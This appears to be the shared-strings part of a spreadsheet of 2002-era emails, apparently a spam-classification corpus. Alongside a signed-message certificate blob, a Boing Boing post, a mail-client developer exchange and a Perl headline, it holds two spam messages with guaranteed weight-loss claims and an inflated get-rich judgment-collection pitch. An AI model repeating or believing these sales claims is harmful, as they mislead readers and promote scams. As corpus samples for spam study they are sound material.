 ggHjoAMCAQICARcwDQYJKoZIhvcNAQEFBQAwUzELMAkGA1UEBhMCVVMxHDAaBgNVBAoTE0VxdWlm
 YXggU2VjdXJlIEluYy4xJjAkBgNVBAMTHUVxdWlmYXggU2VjdXJlIGVCdXNpbmVzcyBDQS0xMB4X
 DTAyMDQxODE1MjkzN1oXDTIwMDQxMzE1MjkzN1owTjELMAkGA1UEBhMCVVMxFjAUBgNVBAoTDUdl
 b1RydXN0IEluYy4xJzAlBgNVBAMTHkdlb1RydXN0IFRydWUgQ3JlZGVudGlhbHMgQ0EgMjCBnzAN
 BgkqhkiG9w0BAQEFAAOBjQAwgYkCgYEAspcspZISpYX/aJqWoYcSyyGqFby3OvsepRzLRU0ENDJR
 wJo7DwFpirRFOUQkTkKXsY6BQzX/CeCRrn9i4ny5gcXuI2JSyrSmDwobbwl52n5cPEbHGcebybWd
 KfAf8vvkxYUnTmDZPtt2ob5RNpJTeTiq9MpNCB/5G7Ocr1hEljcCAwEAAaNjMGEwDgYDVR0PAQH/
 BAQDAgHGMB0GA1UdDgQWBBQig0tNIAIMMfR8WrAaTRXIeF0RSTAPBgNVHRMBAf8EBTADAQH/MB8G
 A1UdIwQYMBaAFEp4MlIR21kWNl7fwRQ2QGpHfEyhMA0GCSqGSIb3DQEBBQUAA4GBACmw3z+sLsLS
 fAfdECQJPfiZFzJzSPQKLwY7vHnNWH2lAKYECbtAFHBpdyhSPkrj3KghXeIJnKyMFjsK6xd1k1Yu
 wMXrauUH+HIDuZUg4okBwQbhBTqjjEdo/cCHILQsaLeU2kM+n5KKrpb0uvrHrocGffRMrWhz9zYB
 lxoq0/EEMIICgjCCAeugAwIBAgIBBDANBgkqhkiG9w0BAQQFADBTMQswCQYDVQQGEwJVUzEcMBoG
 A1UEChMTRXF1aWZheCBTZWN1cmUgSW5jLjEmMCQGA1UEAxMdRXF1aWZheCBTZWN1cmUgZUJ1c2lu
 ZXNzIENBLTEwHhcNOTkwNjIxMDQwMDAwWhcNMjAwNjIxMDQwMDAwWjBTMQswCQYDVQQGEwJVUzEc
 MBoGA1UEChMTRXF1aWZheCBTZWN1cmUgSW5jLjEmMCQGA1UEAxMdRXF1aWZheCBTZWN1cmUgZUJ1
 c2luZXNzIENBLTEwgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBAM4vGbwXt3fek6lfWg0XTzQa
 DJj0ItlZ1MRoRvC0NcWFAyDGr0WlIVFFQesWWDYyb+JQYmT5/VGcqiTZ9J2DKocKIdMSODRsjQBu
 WqDZQu4aIZX5UkxVWsUPOE9G+m34LjXWHXzr4vCwdYDIqROsvojvOm6rXyo4YgKwEnv+j6YDAgMB
 AAGjZjBkMBEGCWCGSAGG+EIBAQQEAwIABzAPBgNVHRMBAf8EBTADAQH/MB8GA1UdIwQYMBaAFEp4
 MlIR21kWNl7fwRQ2QGpHfEyhMB0GA1UdDgQWBBRKeDJSEdtZFjZe38EUNkBqR3xMoTANBgkqhkiG
 9w0BAQQFAAOBgQB1W6ibAxHm6VZMzfmpTMANmvPMZWnmJXbMWbfWVMMdzZmsGd20hdXgPfxiIKeE
 S1hl8eL5lSE/9dR+WB5Hh1Q+WKG1tfgq73HnvMP2sUlG4tega+VWeponmHxGYhTnyfxuAxJ5gDgd
 SIKN/Bf+KpYrtWKmpj29f5JZzVoqgrI3eTCCBBowggODoAMCAQICAxAAdTANBgkqhkiG9w0BAQQF
 ADBOMQswCQYDVQQGEwJVUzEWMBQGA1UEChMNR2VvVHJ1c3QgSW5jLjEnMCUGA1UEAxMeR2VvVHJ1
 c3QgVHJ1ZSBDcmVkZW50aWFscyBDQSAyMB4XDTAyMDgwNzE3MzA1NloXDTAzMDgyMTE3MzA1Nlow
 ggHQMQswCQYDVQQGEwJVUzFJMEcGA1UEChNAR2VvVHJ1c3QgVHJ1ZSBDcmVkZW50aWFscyBDdXN0
 b21lciAtIE9yZ2FuaXphdGlvbiBub3QgdmFsaWRhdGVkLjE/MD0GA1UECxM2Q1BTIHRlcm1zIGlu
 Y29ycG9yYXRlZCBieSByZWZlcmVuY2UgbGlhYmlsaXR5IGxpbWl0ZWQuMUkwRwYDVQQLE0BTZWUg
 VHJ1ZSBDcmVkZW50aWFscyBFeHByZXNzIENQUyB3d3cuZ2VvdHJ1c3QuY29tL3Jlc291cmNlcy9D
 UFMuMS0wKwYDVQQLEyRFbWFpbCBjb250cm9sIHZhbGlkYXRlZCBieSBHZW9UcnVzdC4xPzA9BgNV
 BAsTNklkZW50aXR5IGF1dGhlbnRpY2F0ZWQgYnkgUmVnaXN0cmF0aW9uIEF1dGhvcml0eSAoUkEp
 LjFCMEAGA1UECxQ5UmVnaXN0cmF0aW9uIEF1dGhvcml0eSAoUkEpIC0gcm9kLWdlb3RydXN0QGFy
 c2VjYW5kbGUub3JnMRMwEQYDVQQDEwpyT0QgQmVnYmllMSEwHwYJKoZIhvcNAQkBFhJyT0RAYXJz
 ZWNhbmRsZS5vcmcwgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBAMXm5uxWzmnY4QqgZrm7Y0Hp
 CRnHrXk8zcYCYwTO4Jsh3wdeUEzzAXLuU+kkGduVA8QXWWNb61zlXwNhVMAuazPlLTmdce6GSFVO
 zCOYViHcuXnF4gj6ptYXTYReKrIznwYW50r7iKRrnsAeVqMMo9D9oM9bS+ySFcQhIBZZl+0lAgMB
 AAGjgYEwfzARBglghkgBhvhCAQEEBAMCBaAwDgYDVR0PAQH/BAQDAgXgMDkGA1UdHwQyMDAwLqAs
 oCqGKGh0dHA6Ly9jcmwuZ2VvdHJ1c3QuY29tL2NybHMvZ3R0Y2NhMi5jcmwwHwYDVR0jBBgwFoAU
 IoNLTSACDDH0fFqwGk0VyHhdEUkwDQYJKoZIhvcNAQEEBQADgYEAeZyTyjFzabynSLBSiQTLxPgp
 0YoEvrYnCGdioATy99A0TpmWwR+h6hO2iJPTersqPg4iUJrK5douLHjwrzzzJCscFRACsQXuOh+wG
 oilcCkXEMbqx+ShedO+rthR41RM/l06T45p1lgLJQyYPjy9jpzf8XY0K8GXPK/rtt323fOYxggG4
 MIIBtAIBATBVME4xCzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1HZW9UcnVzdCBJbmMuMScwJQYDVQQD
 Ex5HZW9UcnVzdCBUcnVlIENyZWRlbnRpYWxzIENBIDICAxAAdTAJBgUrDgMCGgUAoIG6MBgGCSqG
 SIb3DQEJAzELBgkqhkiG9w0BBwEwHAYJKoZIhvcNAQkFMQ8XDTAyMDgxNTEzMzExNFowIwYJKoZI
 hvcNAQkEMRYEFPU20cUcxbb7Jr8xB6HmSrA49uOFMFsGCSqGSIb3DQEJDzFOMEwwCgYIKoZIhvcN
 AwcwDgYIKoZIhvcNAwICAgCAMA0GCCqGSIb3DQMCAgFAMAcGBSsOAwIHMA0GCCqGSIb3DQMCAgEo
 MAcGBSsOAwIdMA0GCSqGSIb3DQEBAQUABIGAlwFnZzQnaweuePsqblxBkvc3g+/39icTWoKEgoJt
 IFCB3uEEOGcU6mjjglUNbqSYKmmpioCv6pfN7MIIudPKtAuRfAUGJnKXc7vrJ0ilQ0lTRsR9DZok
 KH6So5bO0lu+F5/IpdLdh+rTEJjbrHcF0H1UCgNXFaJLi6xh3r2kIMsAAAAAAAA=
 ------=_NextPart_000_02F4_01C2443E.80476960--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</si>
  <si>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Football players addicted to video football
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85531549
 Date: Not supplied
 Pro football players are addicted to football games, as a means of 
 wish-fulfillment -- by "managing" the team, they can be free of the rule of 
 their coaches and bosses. Maybe this explains the amazing success of The Sims, 
 which, on the face of it, should be dull as hell: While away your free time 
 away from the office by simulating an existence as a shlub with a day-job and a 
 drive to acquire consumer goods on credit. You'd think it'd be the last thing 
 you want to do. But it's not. When you're a Sim, you can tweak your existence a 
 smidge, discover what life would be like if you took Path A instead of Path B, 
 try the alternate universe on for size. The idea of football players playing 
 themselves in licensed video games is neat and recursive, like the episode of 
 the Simpsons when Mr. Burns runs into Krusty buying Krusty-O's at the 
 supermarket and asks where he can find the "Burns-O's." 
     "It's always a trip," Carr says. "The first time I saw myself in a video 
     game was in college (at Fresno State) when I walked into a Best Buy store 
     and some kid was playing with me. That kind of trips you out a little bit." 
     For every 12-year-old kid who spends countless hours in front of a 
     television playing video games, there's a group of 300-pound offensive 
     linemen challenging each other at everything from Madden NFL 2003 to the 
     action-packed "Halo: Combat Evolved."  
 Link[1] Discuss[2] (_Thanks, Lawrence[3]!_)
 [1] http://www.chron.com/cs/CDA/story.hts/sports/1604474
 [2] http://www.quicktopic.com/boing/H/XWcdy9AcBAh
 [3] http://www.io.com/~lawrence
</t>
  </si>
  <si>
    <t xml:space="preserve">    Date:        Thu, 22 Aug 2002 10:04:06 -0500
     From:        Chris Garrigues &lt;cwg-dated-1030460647.7351a3@DeepEddy.Com&gt;
     Message-ID:  &lt;1030028647.6462.TMDA@deepeddy.vircio.com&gt;
   | hmmm, I assume you're going to report this to the nmh folks?
 It turns out, when I did some investigation, that my memory of how MH
 worked here was wrong (that's not unusual) - the -seq switch seems to
 have always done -nolist (requiring a subsequent -list to turn it on
 again).
 Given that, I have no idea how the pick code as it was ever worked.  In
 fact, it quite possibly never did the way it was intended to (I have just
 been browsing the 2.5 sources, and that seems to be attempting to do things
 that I never saw happen).
 It may be that your new sequence method just exposed the bug that had been
 there all along.
 Given this, I won't be sending any bug reports to the nmh people.  If nmh
 ever seems to be showing any signs further progress, and if I remember this
 then, I might send them a change request.   The code to make the change is
 trivial.
 kre
 _______________________________________________
 Exmh-workers mailing list
 Exmh-workers@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-workers
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [use Perl] Headlines for 2002-09-11
</t>
  </si>
  <si>
    <t xml:space="preserve">use Perl Daily Headline Mailer
 DynDNS.org Offers Free DNS To Perl Sites
     posted by KM on Tuesday September 10, @08:23 (news)
     http://use.perl.org/article.pl?sid=02/09/10/1225228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</si>
  <si>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This is a multi-part message in MIME format.
 ------=_NextPart_000_74AB3_01C24D88.7DFFEAD0
 Content-Type: text/plain;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: 7bit
 1) Join the Web's Hottest &amp; Fastest Growing Community
 It Is So Hot! &lt;http://www.adclick.ws/p.cfm?o=259&amp;s=pk007&gt; 
 2) Guaranteed to lose 10-12 lbs in 30 days
 Slim Patch - Weight Loss Patches
 &lt;http://www.adclick.ws/p.cfm?o=249&amp;s=pk007&gt; 
 3) Get the Child Support You Deserve
 Free Legal Advice &lt;http://www.adclick.ws/p.cfm?o=245&amp;s=pk002&gt; 
 Have a Wonderful Day, 
 Offer Manager
  &lt;http://www.qves.com/trim/?zzzz@example.com%7C17%7C308417&gt; 
 ------=_NextPart_000_74AB3_01C24D88.7DFFEAD0
 Content-Type: text/html;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 &lt;html&gt;
 &lt;body bgcolor=3D"#FFFFFF" text=3D"#000000"&gt;
 1) Join the Web's Hottest &amp; Fastest Growing Community&lt;br&gt;
   &lt;a href=3D"http://www.adclick.ws/p.cfm?o=3D259&amp;s=3Dpk007" =
 target=3D"_blank"&gt;It Is=20
   So Hot!&lt;/a&gt;&lt;br&gt;
   &lt;br&gt;
   2) Guaranteed to lose 10-12 lbs in 30 days&lt;br&gt;
   &lt;a href=3D"http://www.adclick.ws/p.cfm?o=3D249&amp;s=3Dpk007" =
 target=3D"_blank"&gt;Slim=20
   Patch - Weight Loss Patches&lt;/a&gt;&lt;br&gt;
   &lt;br&gt;
   3) Get the Child Support You Deserve&lt;br&gt;
   &lt;a href=3D"http://www.adclick.ws/p.cfm?o=3D245&amp;s=3Dpk002" =
 target=3D"_blank"&gt;Free=20
   Legal Advice&lt;/a&gt;&lt;br&gt;
 &lt;br&gt;
   Have a Wonderful Day, &lt;br&gt;
   Offer Manager&lt;br&gt;
 &lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;center&gt;&lt;a =
 href=3D"http://www.qves.com/trim/?zzzz@example.com%7C17%7C308417"&gt;&lt;img =
 border=3D"0" =
 src=3D"http://209.63.151.9/trim/?17%7C306356%7C6644"&gt;&lt;/a&gt;&lt;/center&gt;&lt;/body&gt;=
 &lt;/html&gt;
 ------=_NextPart_000_74AB3_01C24D88.7DFFEAD0--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: judicial judgments-child support                       LM
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;HTML&gt;&lt;FONT  COLOR=3D"#0000ff" BACK=3D"#ffffff" style=3D"BACKGROUND-COLOR: =
 #ffffff" SIZE=3D3 PTSIZE=3D12 FAMILY=3D"SANSSERIF" FACE=3D"Arial" LANG=3D"=
 0"&gt;Thank you for your interest!&lt;BR&gt;
 &lt;BR&gt;
 Judgment Courses offers an extensive training&lt;BR&gt;
 course in &lt;/FONT&gt;&lt;FONT  COLOR=3D"#ff0000" BACK=3D"#ffff00" style=3D"BACKGR=
 OUND-COLOR: #ffff00" SIZE=3D3 PTSIZE=3D12 FAMILY=3D"SANSSERIF" FACE=3D"Ari=
 al" LANG=3D"0"&gt;&lt;B&gt;"How to Collect MoneyJudgments"&lt;/FONT&gt;&lt;/FONT&gt;&lt;FONT  COLO=
 R=3D"#0000ff" BACK=3D"#ffffff" style=3D"BACKGROUND-COLOR: #ffffff" SIZE=3D=
 3 PTSIZE=3D12 FAMILY=3D"SANSSERIF" FACE=3D"Arial" LANG=3D"0"&gt;&lt;/B&gt;&lt;BR&gt;
 &lt;BR&gt;
 If you are like many people, you are not even sure what a&lt;BR&gt;
 Money Judgment is and &lt;/FONT&gt;&lt;FONT  COLOR=3D"#ff0000" BACK=3D"#ffff00" sty=
 le=3D"BACKGROUND-COLOR: #ffff00" SIZE=3D3 PTSIZE=3D12 FAMILY=3D"SANSSERIF"=
  FACE=3D"Arial" LANG=3D"0"&gt;&lt;B&gt;why processing Money Judgments&lt;BR&gt;
 can earn you very substantial income&lt;/FONT&gt;&lt;FONT  COLOR=3D"#ff0000" BACK=3D=
 "#ffffff" style=3D"BACKGROUND-COLOR: #ffffff" SIZE=3D3 PTSIZE=3D12 FAMILY=3D=
 "SANSSERIF" FACE=3D"Arial" LANG=3D"0"&gt; &lt;/FONT&gt;&lt;FONT  COLOR=3D"#0000ff" BAC=
 K=3D"#ffffff" style=3D"BACKGROUND-COLOR: #ffffff" SIZE=3D3 PTSIZE=3D12 FAM=
 ILY=3D"SANSSERIF" FACE=3D"Arial" LANG=3D"0"&gt;&lt;/B&gt;.&lt;BR&gt;
 &lt;BR&gt;
 If you ever sue a company or a person and you win then you&lt;BR&gt;
 will have a Money Judgment against them.&lt;BR&gt;
 &lt;BR&gt;
 You are happy you won but you will soon find out the&lt;BR&gt;
 shocking fact: &amp;quot;Its now up to you to collect on the&lt;BR&gt;
 Judgment&amp;quot;. The court does not require the loser to pay you.&lt;BR&gt;
 The court will not even help you. You must trace the loser&lt;BR&gt;
 down, find their assets, their employment, bank accounts,&lt;BR&gt;
 real estate, stocks and bonds, etc.&lt;BR&gt;
 &lt;BR&gt;
 Very few people know how to find these assets or what to do&lt;BR&gt;
 when they are found. The result is that millions of&lt;BR&gt;
 Judgments are just sitting in files and being forgotten.&lt;BR&gt;
 &lt;BR&gt;
 &amp;quot;In 79% of the cases the winner of a Judgment never sees a&lt;BR&gt;
 dime.&amp;quot;&lt;BR&gt;
 &lt;BR&gt;
 The non-payment of judicial debt has grown to epidemic&lt;BR&gt;
 proportions. Right now in the United States there is&lt;BR&gt;
 between &lt;/FONT&gt;&lt;FONT  COLOR=3D"#ff0000" BACK=3D"#ffff00" style=3D"BACKGROU=
 ND-COLOR: #ffff00" SIZE=3D3 PTSIZE=3D12 FAMILY=3D"SANSSERIF" FACE=3D"Arial=
 " LANG=3D"0"&gt;200 and 300 billion dollars of uncollectedMoney&lt;BR&gt;
 Judgment debt&lt;/FONT&gt;&lt;FONT  COLOR=3D"#ff0000" BACK=3D"#ffffff" style=3D"BAC=
 KGROUND-COLOR: #ffffff" SIZE=3D3 PTSIZE=3D12 FAMILY=3D"SANSSERIF" FACE=3D"=
 Arial" LANG=3D"0"&gt; &lt;/FONT&gt;&lt;FONT  COLOR=3D"#0000ff" BACK=3D"#ffffff" style=3D=
 "BACKGROUND-COLOR: #ffffff" SIZE=3D3 PTSIZE=3D12 FAMILY=3D"SANSSERIF" FACE=
 =3D"Arial" LANG=3D"0"&gt;. For every Judgment that is paid, 5more&lt;BR&gt;
 Judgments take its place.&lt;BR&gt;
 &lt;BR&gt;
 We identified this massive market 8 years ago and have&lt;BR&gt;
 actively pursued Judicial Judgments since. We invented this&lt;BR&gt;
 business. We have perfected it into a well proven and solid&lt;BR&gt;
 profession in which only a select few will be trained in the&lt;BR&gt;
 techniques necessary to succeed.&lt;BR&gt;
 &lt;BR&gt;
 With our first hand experience we have built a course which&lt;BR&gt;
 teaches you how to start your business in this new unknown&lt;BR&gt;
 and exciting field of processing Money Judgments.&lt;BR&gt;
 &lt;BR&gt;
 By following the steps laid out in our course and with&lt;BR&gt;
 reasonable effort you can become very successful in the&lt;BR&gt;
 processing of Money Judgments.&lt;BR&gt;
 &lt;BR&gt;
 The income potential is substantial in this profession.&lt;/FONT&gt;&lt;FONT  COLOR=
 =3D"#ff0000" BACK=3D"#ffffff" style=3D"BACKGROUND-COLOR: #ffffff" SIZE=3D3=
  PTSIZE=3D12 FAMILY=3D"SANSSERIF" FACE=3D"Arial" LANG=3D"0"&gt; &lt;/FONT&gt;&lt;FONT =
  COLOR=3D"#ff0000" BACK=3D"#ffff00" style=3D"BACKGROUND-COLOR: #ffff00" SI=
 ZE=3D3 PTSIZE=3D12 FAMILY=3D"SANSSERIF" FACE=3D"Arial" LANG=3D"0"&gt;&lt;B&gt;We&lt;BR=
 &gt;
 have associates who have taken our course and are now&lt;BR&gt;
 working full time making $96,000.00 to over $200,000.00 per&lt;BR&gt;
 year. Part time associates are earning between $24,000.00&lt;BR&gt;
 and $100,000.00 per year&lt;/FONT&gt;&lt;FONT  COLOR=3D"#0000ff" BACK=3D"#ffff00" s=
 tyle=3D"BACKGROUND-COLOR: #ffff00" SIZE=3D3 PTSIZE=3D12 FAMILY=3D"SANSSERI=
 F" FACE=3D"Arial" LANG=3D"0"&gt; &lt;/FONT&gt;&lt;FONT  COLOR=3D"#0000ff" BACK=3D"#fff=
 fff" style=3D"BACKGROUND-COLOR: #ffffff" SIZE=3D3 PTSIZE=3D12 FAMILY=3D"SA=
 NSSERIF" FACE=3D"Arial" LANG=3D"0"&gt;.&lt;/B&gt; Some choose to operateout of&lt;BR&gt;
 their home and work by themselves. Others build a sizable&lt;BR&gt;
 organization of 15 to 25 people in attractive business&lt;BR&gt;
 offices.&lt;BR&gt;
 &lt;BR&gt;
 Today our company and our associates have over 126&lt;BR&gt;
 million dollars in Money Judgments that we are currently&lt;BR&gt;
 processing. Of this 126 million, 25 million is in the form&lt;BR&gt;
 of joint ventures between our firm and our associates.&lt;BR&gt;
 Joint ventures are where we make our money. We only break&lt;BR&gt;
 even when our course is purchased. We make a 12% margin on&lt;BR&gt;
 the reports we supply to our associates. Our reporting&lt;BR&gt;
 capability is so extensive that government agencies, police&lt;BR&gt;
 officers, attorneys, credit agencies etc., all come to us&lt;BR&gt;
 for reports.&lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 Many of our associates already have real estate liens in&lt;BR&gt;
 force of between 5 million to over 15 million dollars.&lt;BR&gt;
 Legally this means that when the properties are sold or&lt;BR&gt;
 refinanced our associate must be paid off. The norm is 10%&lt;BR&gt;
 interest compounded annually on unpaid Money Judgments.&lt;BR&gt;
 Annual interest on 5 million at 10% translates to&lt;BR&gt;
 $500,000.00 annually in interest income, not counting the&lt;BR&gt;
 payment of the principal.&lt;BR&gt;
 &lt;BR&gt;
 Our associates earn half of this amount or $250,000.00 per&lt;BR&gt;
 year. This is just for interest, not counting principle&lt;BR&gt;
 and not counting the compounding of the interest which can&lt;BR&gt;
 add substantial additional income. Typically companies are&lt;BR&gt;
 sold for 10 times earnings. Just based on simple interest&lt;BR&gt;
 an associate with 5 million in real estate liens could sell&lt;BR&gt;
 their business for approximately 2.5 million dollars.&lt;BR&gt;
 &lt;BR&gt;
 92% of all of our associates work out of their home; 43%&lt;BR&gt;
 are women and 36% are part time .&lt;BR&gt;
 &lt;BR&gt;
 One of the benefits of working in this field is that you are&lt;BR&gt;
 not under any kind of time frame. If you decide to take off&lt;BR&gt;
 for a month on vacation then go. The Judgments you are&lt;BR&gt;
 working on will be there when you return. The Judgments&lt;BR&gt;
 are still in force, they do not disappear.&lt;BR&gt;
 &lt;BR&gt;
 The way we train you is non-confrontational. You use your&lt;BR&gt;
 computer and telephone to do most of the processing. You&lt;BR&gt;
 never confront the debtor. The debtor doesn't know who you&lt;BR&gt;
 are. You are not a collection agency.&lt;BR&gt;
 &lt;BR&gt;
 Simply stated the steps to successful Money Processing&lt;BR&gt;
 are as follows:&lt;BR&gt;
 &lt;BR&gt;
 Mail our recommended letter to companies and individuals&lt;BR&gt;
 with Money Judgments. (We train you how to find out who&lt;BR&gt;
 to write to)&lt;BR&gt;
 &lt;BR&gt;
 8% to 11% of the firms and people you write will call you&lt;BR&gt;
 and ask for your help. They call you, you don't call them&lt;BR&gt;
 unless you want to.&lt;BR&gt;
 &lt;BR&gt;
 You send them an agreement (supplied in the course) to&lt;BR&gt;
 sign which splits every dollar you collect 50% to you and&lt;BR&gt;
 50% to them. This applies no matter if the judgment is for&lt;BR&gt;
 $2,000.00 or $2,000,000.00.&lt;BR&gt;
 &lt;BR&gt;
 You then go on-line to our computers to find the debtor&lt;BR&gt;
 and their assets. We offer over 120 powerful reports to&lt;BR&gt;
 assist you. They range from credit reports from all three&lt;BR&gt;
 credit bureaus, to bank account locates, employment&lt;BR&gt;
 locates, skip traces and locating stocks and bonds, etc.&lt;BR&gt;
 The prices of our reports are very low. Typically 1/2 to&lt;BR&gt;
 1/3 of what other firms charge. For example we charge&lt;BR&gt;
 $6.00 for an individuals credit report when some other&lt;BR&gt;
 companies charge $25.00.&lt;BR&gt;
 &lt;BR&gt;
 Once you find the debtor and their assets you file&lt;BR&gt;
 garnishments and liens on the assets you have located.&lt;BR&gt;
 (Standard fill in the blanks forms are included in the&lt;BR&gt;
 course)&lt;BR&gt;
 &lt;BR&gt;
 When you receive the assets you keep 50% and send 50% to&lt;BR&gt;
 the original Judgment holder.&lt;BR&gt;
 &lt;BR&gt;
 Once the Judgment is fully paid you mail a Satisfaction of&lt;BR&gt;
 Judgment to the court. (Included in the course)&lt;BR&gt;
 &lt;BR&gt;
 Quote's from several of our students:&lt;BR&gt;
 &lt;BR&gt;
 Thomas in area code 516 writes us: "I just wanted to drop&lt;BR&gt;
 you a short note thanking you for your excellent course. &lt;/FONT&gt;&lt;FONT  COL=
 OR=3D"#ff0000" BACK=3D"#ffff00" style=3D"BACKGROUND-COLOR: #ffff00" SIZE=3D=
 3 PTSIZE=3D12 FAMILY=3D"SANSSERIF" FACE=3D"Arial" LANG=3D"0"&gt;My&lt;BR&gt;
 first week, part time, will net me 3,700.00 dollars&lt;/FONT&gt;&lt;/FONT&gt;&lt;FONT  CO=
 LOR=3D"#0000ff" BACK=3D"#ffffff" style=3D"BACKGROUND-COLOR: #ffffff" SIZE=3D=
 3 PTSIZE=3D12 FAMILY=3D"SANSSERIF" FACE=3D"Arial" LANG=3D"0"&gt; .Your&lt;BR&gt;
 professionalism in both the manual and your support.  &lt;BR&gt;
 You have the video opened doors for me in the future. &lt;BR&gt;
 There's no stopping me now. Recently Thomas states &lt;BR&gt;
 he has over $8,500,000 worth of judgments he is working on"&lt;BR&gt;
 &lt;BR&gt;
 After only having this course for four months, Larry S. in&lt;BR&gt;
 area code 314 stated to us: &lt;/FONT&gt;&lt;FONT  COLOR=3D"#ff0000" BACK=3D"#ffff0=
 0" style=3D"BACKGROUND-COLOR: #ffff00" SIZE=3D3 PTSIZE=3D12 FAMILY=3D"SANS=
 SERIF" FACE=3D"Arial" LANG=3D"0"&gt;"I am now making $2,000.00 per&lt;BR&gt;
 week&lt;/FONT&gt;&lt;FONT  COLOR=3D"#0000ff" BACK=3D"#ffff00" style=3D"BACKGROUND-C=
 OLOR: #ffff00" SIZE=3D3 PTSIZE=3D12 FAMILY=3D"SANSSERIF" FACE=3D"Arial" LA=
 NG=3D"0"&gt; &lt;/FONT&gt;&lt;FONT  COLOR=3D"#0000ff" BACK=3D"#ffffff" style=3D"BACKGR=
 OUND-COLOR: #ffffff" SIZE=3D3 PTSIZE=3D12 FAMILY=3D"SANSSERIF" FACE=3D"Ari=
 al" LANG=3D"0"&gt;and expect this to grow to twice this amountwithin the&lt;BR&gt;
 next year. I am having a ball. I have over $250,000 in&lt;BR&gt;
 judgments I am collecting on now"&lt;BR&gt;
 &lt;BR&gt;
 After having our course for 7 months Larry S. in 314 stated&lt;BR&gt;
 "I am now making $12,000.00 per month and have approximately&lt;BR&gt;
 $500,000.00 in judgments I am collecting on. Looks like I&lt;BR&gt;
 will have to hire someone to help out"&lt;BR&gt;
 &lt;BR&gt;
 Marshal in area code 407 states to us "I feel bad, you only&lt;BR&gt;
 charged me $259.00 for this course and it is a goldmine. I&lt;BR&gt;
 have added 3 full time people to help me after only having&lt;BR&gt;
 your course for 5 months"&lt;BR&gt;
 &lt;BR&gt;
 &gt;From the above information and actual results you can see&lt;BR&gt;
 why we can state the following:&lt;BR&gt;
 &lt;BR&gt;
 With our course you can own your own successful business.&lt;BR&gt;
 A business which earns you substantial income now and one&lt;BR&gt;
 which could be sold in 3-5 years, paying you enough to&lt;BR&gt;
 retire on and travel the world. A business which is&lt;BR&gt;
 extremely interesting to be in. A Business in which every&lt;BR&gt;
 day is new and exciting.&lt;BR&gt;
 &lt;BR&gt;
 None of your days will be hum-drum. Your brain is&lt;BR&gt;
 Challenged. A business, which protects you from Corporate&lt;BR&gt;
 Downsizing. A business which you can start part time from&lt;BR&gt;
 your home and later, if you so desire, you can work in full&lt;BR&gt;
 time. A business, which is your ticket to freedom from&lt;BR&gt;
 others telling you what to do. A business, which lets you&lt;BR&gt;
 control your own destiny. Our training has made this happen&lt;BR&gt;
 for many others already. Make it happen for you!&lt;BR&gt;
 &lt;BR&gt;
 If the above sounds interesting to you then its time for you&lt;BR&gt;
 to talk to a real live human being, no cost or obligation&lt;BR&gt;
 on your part.&lt;BR&gt;
 &lt;BR&gt;
 &lt;/FONT&gt;&lt;FONT  COLOR=3D"#ff0000" BACK=3D"#ffff00" style=3D"BACKGROUND-COLOR=
 : #ffff00" SIZE=3D3 PTSIZE=3D12 FAMILY=3D"SANSSERIF" FACE=3D"Arial" LANG=3D=
 "0"&gt;&lt;B&gt;Please call us at 1-281-500-4018&lt;/FONT&gt;&lt;/FONT&gt;&lt;FONT  COLOR=3D"#0000=
 ff" BACK=3D"#ffffff" style=3D"BACKGROUND-COLOR: #ffffff" SIZE=3D3 PTSIZE=3D=
 12 FAMILY=3D"SANSSERIF" FACE=3D"Arial" LANG=3D"0"&gt;&lt;/B&gt;.&lt;BR&gt;
 &lt;BR&gt;
 We have Service Support &lt;/FONT&gt;&lt;FONT  COLOR=3D"#ff0000" BACK=3D"#ffff00" s=
 tyle=3D"BACKGROUND-COLOR: #ffff00" SIZE=3D3 PTSIZE=3D12 FAMILY=3D"SANSSERI=
 F" FACE=3D"Arial" LANG=3D"0"&gt;&lt;B&gt;staff available to you from 8:00am to&lt;BR&gt;
 10:00pm (Central Time) 7 days a week &lt;/FONT&gt;&lt;/FONT&gt;&lt;FONT  COLOR=3D"#0000ff=
 " BACK=3D"#ffffff" style=3D"BACKGROUND-COLOR: #ffffff" SIZE=3D3 PTSIZE=3D1=
 2 FAMILY=3D"SANSSERIF" FACE=3D"Arial" LANG=3D"0"&gt;&lt;/B&gt;. If you callthis num=
 ber&lt;BR&gt;
 you can talk to one of our experienced Customer Support personnel.&lt;BR&gt;
 They can answer any questions you may have - with no obligation.&lt;BR&gt;
 Sometimes we run special pricing on our courses and combinations&lt;BR&gt;
 of courses. When you call our Customer Support line they can let&lt;BR&gt;
 you know of any specials we may be running. If you like what you&lt;BR&gt;
 read and hear about our courses, then the Customer Support person&lt;BR&gt;
 can work with you to place your order. We are very low key. We&lt;BR&gt;
 merely give you the facts and you can then decide if you want to&lt;BR&gt;
 work with us or not.&lt;BR&gt;
 &lt;BR&gt;
 Thank you for your time and interest.&lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;/FONT&gt;&lt;FONT  COLOR=3D"#0000ff" BACK=3D"#ffffff" style=3D"BACKGROUND-COLOR=
 : #ffffff" SIZE=3D3 PTSIZE=3D12 FAMILY=3D"FIXED" FACE=3D"Courier New" LANG=
 =3D"0"&gt;+++++&lt;BR&gt;
 This ad is produced and sent out by:&lt;BR&gt;
 UAS&lt;BR&gt;
 To be deleted  from our mailing list please email us at roanna@elitists.co=
 m with "delete" in the sub-line.&lt;BR&gt;
 or write us at:AdminScript-Update, P O B 1 2 0 0, O r a n  g e s t a d, A =
 r  u b a&lt;BR&gt;
